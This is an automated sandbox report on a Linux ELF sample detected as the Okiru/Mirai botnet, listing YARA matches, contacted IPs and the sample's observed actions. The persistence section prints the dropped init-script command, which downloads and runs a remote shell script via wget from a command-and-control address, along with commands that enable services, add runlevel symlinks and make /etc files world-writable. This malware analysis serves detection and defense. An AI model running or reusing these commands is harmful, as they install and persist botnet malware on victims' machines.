Linux Analysis Report
x86_32.nn.elf

Overview

General Information

Sample name: x86_32.nn.elf
Analysis ID: 1580233
MD5: 7a8c8bd1879880b4910dc8511392a718
SHA1: f10607e0a3e2fac1f00257ffccb9a1dc1c69ebaf
SHA256: cbc99993ee3f76b86331fabc4929c8277a76a2d35c86af1982901e8b5f9b03ae
Tags: elfuser-abuse_ch
Infos:

Detection

Okiru
Score: 84
Range: 0 - 100
Whitelisted: false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Okiru
Drops files in suspicious directories
Machine Learning detection for sample
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Writes shell script file to disk with an unusual file extension
Yara signature match

Classification

AV Detection

barindex
Source: x86_32.nn.elf Virustotal: Detection: 23% Perma Link
Source: x86_32.nn.elf ReversingLabs: Detection: 21%
Source: x86_32.nn.elf Joe Sandbox ML: detected
Source: x86_32.nn.elf String: getinfo xxx/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%ssize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.2342surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginnfstftpmallocwaitpidw/etc/motd%s
Source: global traffic TCP traffic: 192.168.2.13:44546 -> 94.156.227.234:38242
Source: global traffic TCP traffic: 192.168.2.13:48202 -> 185.125.190.26:443
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 185.125.190.26
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: x86_32.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh.30.dr, bootcmd.12.dr, custom.service.12.dr String found in binary or memory: http://94.156.227.233/
Source: x86_32.nn.elf, 5432.1.00000000ffe42000.00000000ffe63000.rw-.sdmp String found in binary or memory: http://94.156.227.233/lol.sh
Source: x86_32.nn.elf String found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
Source: unknown Network traffic detected: HTTP traffic on port 48202 -> 443

System Summary

barindex
Source: x86_32.nn.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: x86_32.nn.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: x86_32.nn.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: x86_32.nn.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: getinfo xxx/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%ssize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.2342surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bi
Source: ELF static info symbol of initial sample .symtab present: no
Source: x86_32.nn.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: x86_32.nn.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: x86_32.nn.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: classification engine Classification label: mal84.spre.troj.evad.linELF@0/9@2/0

Persistence and Installation Behavior

barindex
Source: /tmp/x86_32.nn.elf (PID: 5432) File: /etc/profile Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5432) File: /etc/rc.local Jump to behavior
Source: /usr/bin/ln (PID: 5474) File: /etc/rcS.d/S99system -> /etc/init.d/system Jump to behavior
Source: /usr/bin/ln (PID: 5481) File: /etc/rc.d/S99sh -> /etc/init.d/sh Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5432) File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 5472) File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 5477) File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5263/cmdline Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5520/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5521/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5519/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5511/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5599/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5610/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5512/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5513/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5514/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/319/cmdline Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5515/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5537/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5516/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5517/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5518/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5595/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5596/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5597/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5510/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5598/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5508/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5607/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/1/cmdline Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5509/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5608/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5609/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5522/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5523/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5600/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5524/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5601/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5503/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5525/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5602/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5526/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5603/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5527/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5604/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5605/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5484) File opened: /proc/5606/status Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5449) Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1" Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5471) Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1" Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5473) Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1" Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5475) Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh" Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5476) Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1" Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5478) Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5480) Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1" Jump to behavior
Source: /bin/sh (PID: 5472) Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system Jump to behavior
Source: /bin/sh (PID: 5477) Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/sh Jump to behavior
Source: /bin/sh (PID: 5479) Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d Jump to behavior
Source: /bin/sh (PID: 5455) Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5432) File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 5472) File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 5477) File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5432) Writes shell script file to disk with an unusual file extension: /etc/init.d/system Jump to dropped file
Source: /tmp/x86_32.nn.elf (PID: 5432) Writes shell script file to disk with an unusual file extension: /etc/rc.local Jump to dropped file
Source: /bin/sh (PID: 5475) Writes shell script file to disk with an unusual file extension: /etc/init.d/sh Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/x86_32.nn.elf (PID: 5432) File: /etc/init.d/system Jump to dropped file
Source: /bin/sh (PID: 5475) File: /etc/init.d/sh Jump to dropped file

Stealing of Sensitive Information

barindex
Source: Yara match File source: x86_32.nn.elf, type: SAMPLE
Source: Yara match File source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: x86_32.nn.elf PID: 5432, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: x86_32.nn.elf, type: SAMPLE
Source: Yara match File source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: x86_32.nn.elf PID: 5432, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs